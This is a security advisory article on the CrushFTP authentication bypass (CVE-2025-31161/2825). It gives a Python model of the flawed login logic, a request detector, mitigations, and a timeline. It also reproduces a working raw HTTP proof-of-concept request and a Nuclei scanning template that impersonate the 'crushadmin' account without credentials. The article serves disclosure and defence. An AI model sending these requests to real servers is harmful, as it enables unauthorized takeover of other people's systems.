
CrushFTP Flaw Exposed: Hackers Are Taking Over Systems Right Now – Are You Next?
Key Points
- CVE-2025-31161 enables unauthenticated access to CrushFTP servers, leading to full system takeover.
- Affects versions 10.0.0–10.8.3 and 11.0.0–11.3.0; patched in 10.8.4 and 11.3.1.
- Exploited since March 30, 2025, targeting marketing, retail, and semiconductor sectors.
- Immediate patching and DMZ mode recommended for mitigation.
NOTE: Much of this article’s information, including the PoC and detection template, was sourced from the ProjectDiscovery Blog – CrushFTP Authentication Bypass. Please check out the original article to support their excellent work.
Introduction
A critical flaw in CrushFTP, tracked as CVE-2025-31161 (the identifier CISA uses; CVE-2025-2825 was assigned in parallel for the same bug and is the id ProjectDiscovery’s template uses below), is making waves in cybersecurity circles. This authentication bypass lets attackers take over servers without credentials, and it is being exploited now. Here’s the rundown on what’s at stake and how to lock it down.
What’s the Vulnerability?
CVE-2025-2825 is a severe authentication bypass in CrushFTP, a versatile file transfer server. Rated CVSS 9.8 (AV:N/AC:L/PR:N/UI:N), it is a high-stakes issue: no login needed, low effort required, and full control of the server as the prize. It affects versions 10.0.0 to 10.8.3 and 11.0.0 to 11.3.0, with fixes in 10.8.4 and 11.3.1. The root cause is a flaw in the S3-compatible (AWS Signature V4 style) authentication handler that lets an attacker act as any existing account simply by naming it, including the default administrator “crushadmin”.
How It’s Being Exploited
Attackers have been exploiting this since March 30, 2025, zeroing in on marketing, retail, and semiconductor industries. They’re using MeshAgent for remote access and Telegram malware for command-and-control. Shadowserver reports over 1,500 exposed servers, and CISA’s added it to their Known Exploited Vulnerabilities catalog—proof it’s a major threat.
Technical Breakdown
The issue lies in the loginCheckHeaderAuth() method of ServerSessionHTTP.java, which processes S3-style Authorization headers (e.g., AWS4-HMAC-SHA256 Credential=crushadmin/). A flag, lookup_user_pass, defaults to true unless a tilde (~) splits the username into a user/password pair. This flag trickles down to UserTools.verify_user(), where true skips the password check entirely. The result: a single crafted HTTP request carrying that header, an attacker-chosen CrushAuth cookie, and a c2f parameter equal to the cookie’s last four characters is enough to act as the named account, crushadmin included.
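To make the control flow concrete, here is a Python model of the logic just described. It is an added example, not CrushFTP’s Java code: the user store, the account names and passwords are constructed, the real S3 signature handling is omitted, and the s3_auth_lookup_password_supported keyword stands in for the server setting the patch flips to false.

```python
import re

# Constructed user store standing in for CrushFTP's user directory; the accounts
# and passwords are invented for this example.
USERS = {"crushadmin": "correct horse battery staple", "alice": "hunter2"}

CRED_RE = re.compile(r"Credential=([^/,\s]+)/")


def parse_s3_username(authorization):
    """Pull the username out of an S3-style header, or return None for any other scheme."""
    if not authorization or not authorization.startswith("AWS4-HMAC-SHA256 "):
        return None
    match = CRED_RE.search(authorization)
    return match.group(1) if match else None


def verify_user(user, password, lookup_user_pass):
    """Model of UserTools.verify_user().

    With lookup_user_pass=True the server relies on the stored credential itself instead
    of comparing anything the client sent, so an existing account name is all it takes.
    """
    if user not in USERS:
        return False
    if lookup_user_pass:
        return True
    return password is not None and USERS[user] == password


def login_check_header_auth(authorization, s3_auth_lookup_password_supported=True):
    """Model of ServerSessionHTTP.loginCheckHeaderAuth().

    Returns the authenticated username or None. The keyword argument plays the role of
    the setting the 11.3.1 patch sets to false; the vulnerable default is True.
    """
    user = parse_s3_username(authorization)
    if user is None:
        return None
    password = None
    if "~" in user:
        # "user~password" form: the client supplied a password, so it must be checked.
        user, password = user.split("~", 1)
        lookup_user_pass = False
    else:
        # No tilde: the flag falls back to the setting, which is True before the patch.
        lookup_user_pass = s3_auth_lookup_password_supported
    return user if verify_user(user, password, lookup_user_pass) else None


def csrf_pairing_ok(crush_auth_cookie, c2f):
    """The c2f query parameter must equal the last four characters of the CrushAuth
    cookie, which is why the public PoC can mint both values itself."""
    return len(c2f) == 4 and crush_auth_cookie.endswith(c2f)


if __name__ == "__main__":
    poc = "AWS4-HMAC-SHA256 Credential=crushadmin/"
    print("vulnerable:", login_check_header_auth(poc))
    print("patched:   ", login_check_header_auth(poc, s3_auth_lookup_password_supported=False))
    print("c2f check: ", csrf_pairing_ok("1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111", "1111"))
```

Run it and the vulnerable path returns "crushadmin" for a header that carries no secret at all, while the same header fails once the setting is false; only the tilde form, which actually supplies a password, still authenticates on the patched path.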
Mitigation Musts
- Patch Now: Update to CrushFTP 10.8.4 or 11.3.1 immediately.
- DMZ Mode: Can’t patch yet? Front the server with a CrushFTP DMZ instance, which the vendor lists as a mitigation, so the vulnerable HTTP login path is not reachable directly from the Internet.
- Lock It Down: Restrict server access to trusted IPs and keep an eye on logs for strange logins or new accounts.
- Extra Layer: Deploy IDS/IPS to spot suspicious traffic.
Spotting Trouble
Look out for:
- Unauthorized “crushadmin” logins.
- Unexpected new accounts.
- MeshAgent, AnyDesk, or Telegram processes.
- Odd traffic to Telegram endpoints.
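At the HTTP layer the exploit has a recognisable shape: a genuine AWS Signature V4 header always carries a five-part Credential scope plus SignedHeaders= and Signature=, whereas the bypass header stops after the username, and the PoC pairs a self-minted CrushAuth cookie with a matching c2f parameter. The detector below, an added example rather than anything from the original article or from CrushFTP, scores request records on those two signals. The record layout and the three sample requests are constructed for the example; the access key and signature in the legitimate sample are placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# A complete SigV4 Credential scope has five slash-separated parts and the header
# also carries SignedHeaders= and Signature=. The PoC header has none of that.
SIGV4_SCOPE_RE = re.compile(r"Credential=[^/,\s]+/\d{8}/[^/,\s]+/[^/,\s]+/aws4_request")
CRED_USER_RE = re.compile(r"Credential=([^/,\s]+)")


def sigv4_header_is_malformed(authorization):
    """True for an AWS4-HMAC-SHA256 header missing the pieces a genuine S3 client sends."""
    if not authorization.startswith("AWS4-HMAC-SHA256"):
        return False
    complete = (SIGV4_SCOPE_RE.search(authorization) is not None
                and "SignedHeaders=" in authorization
                and "Signature=" in authorization)
    return not complete


def c2f_matches_cookie(cookie_header, query):
    """True when c2f equals the last four characters of CrushAuth, the pairing the PoC forges."""
    cookies = {}
    for part in cookie_header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    c2f = parse_qs(query).get("c2f", [""])[0]
    crush_auth = cookies.get("CrushAuth", "")
    return len(c2f) == 4 and crush_auth.endswith(c2f)


def classify(req):
    """Return the indicators found in one request record (empty list means nothing suspicious)."""
    headers = req["headers"]
    authorization = headers.get("Authorization", "")
    url = urlsplit(req["path"])
    hits = []
    if sigv4_header_is_malformed(authorization):
        hits.append("malformed SigV4 Authorization header")
        match = CRED_USER_RE.search(authorization)
        if match and match.group(1) == "crushadmin":
            hits.append("Credential names crushadmin")
        if url.path.startswith("/WebInterface/function/") and \
                c2f_matches_cookie(headers.get("Cookie", ""), url.query):
            hits.append("WebInterface call with forged CrushAuth/c2f pairing")
    return hits


def scan(requests):
    """Indices of the records that produced at least one indicator."""
    return [i for i, req in enumerate(requests) if classify(req)]


# Constructed request records, as a reverse proxy or WAF might log them; not real traffic.
SAMPLE_REQUESTS = [
    {   # shape of the public PoC
        "path": "/WebInterface/function/?command=getUserList&c2f=1111",
        "headers": {
            "Cookie": "CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111; currentAuth=1111",
            "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
        },
    },
    {   # legitimate SigV4 request to the S3-compatible endpoint (placeholder key and signature)
        "path": "/bucket/report.csv",
        "headers": {
            "Authorization": ("AWS4-HMAC-SHA256 Credential=AKIAEXAMPLE/20250401/us-east-1/s3/aws4_request, "
                              "SignedHeaders=host;x-amz-date, Signature=" + "0" * 64),
        },
    },
    {   # ordinary logged-in web UI call with no Authorization header
        "path": "/WebInterface/function/?command=getUserList&c2f=2222",
        "headers": {"Cookie": "CrushAuth=1743113839553_abcdefghijklmnopqrstuvwx2222; currentAuth=2222"},
    },
]

if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        print(i, classify(SAMPLE_REQUESTS[i]))
```

Only the first record fires. The malformed-header signal alone is the strongest one, because no real S3 SDK emits a Credential without its scope, signed-header list and signature; the cookie/c2f pairing mostly confirms that the caller is driving the web interface rather than the S3 endpoint. Seeing the headers at all requires TLS termination at the proxy, and a successful bypass will additionally show up as a normal-looking login for the named user in CrushFTP’s own logs, so correlate both.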
The Fix
CrushFTP’s 11.3.1 patch (10.8.4 on the 10.x branch) sets s3_auth_lookup_password_supported to false, adds a security gate in front of the S3 login path, and enforces proper password checks. No more easy wins for attackers.
Proof of Concept
Here’s the original PoC from ProjectDiscovery. Note that the c2f query parameter (1111) matches the last four characters of the CrushAuth cookie, and that the cookie itself is attacker-chosen; no prior login is needed:
GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
Source: ProjectDiscovery Blog – CrushFTP Authentication Bypass
Detection Tool
ProjectDiscovery’s Nuclei template for spotting vulnerable servers:
id: CVE-2025-2825

info:
  name: CrushFTP Authentication Bypass
  author: parthmalhotra,Ice3man,DhiyaneshDk,pdresearch
  severity: critical
  description: |
    CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access.
  reference:
    - https://projectdiscovery.io/blog/crushftp-authentication-bypass/
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2825
    cwe-id: CWE-287
    epss-score: 0.00039
    epss-percentile: 0.08378
  metadata:
    max-request: 2
    vendor: crushftp
    product: crushftp
    shodan-query:
      - http.title:"CrushFTP WebInterface"
      - http.favicon.hash:-1022206565
      - http.html:"crushftp"
    fofa-query:
      - icon_hash="-1022206565"
      - title="CrushFTP WebInterface"
      - body="crushftp"
  tags: cve,cve2025,crushftp,unauth,auth-bypass,rce

variables:
  string_1: "{{rand_text_numeric(13)}}"
  string_2: "{{rand_text_alpha(28)}}"
  string_3: "{{rand_text_numeric(4)}}"

http:
  - raw:
      - |
        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
        Host: {{Hostname}}
        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
        Origin: {{RootURL}}
        Referer: {{RootURL}}/WebInterface/login.html
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip

      - |
        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
        Host: {{Hostname}}
        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
        Origin: {{RootURL}}
        Referer: {{RootURL}}/WebInterface/login.html
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<user_list_subitem>crushadmin</user_list_subitem>"

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
Source: ProjectDiscovery Blog – CrushFTP Authentication Bypass
Timeline
- March 21, 2025: Patches 10.8.4 and 11.3.1 released.
- March 30, 2025: Exploitation kicks off.
- April 7, 2025: CISA lists it in KEV.
- April 9, 2025: Still a live wire—act fast!
Wrap-Up
CVE-2025-2825 is a stark reminder: authentication flaws can be catastrophic. If you’re on CrushFTP, patch to 10.8.4 or 11.3.1 now. Spread the word—your server could be in the crosshairs.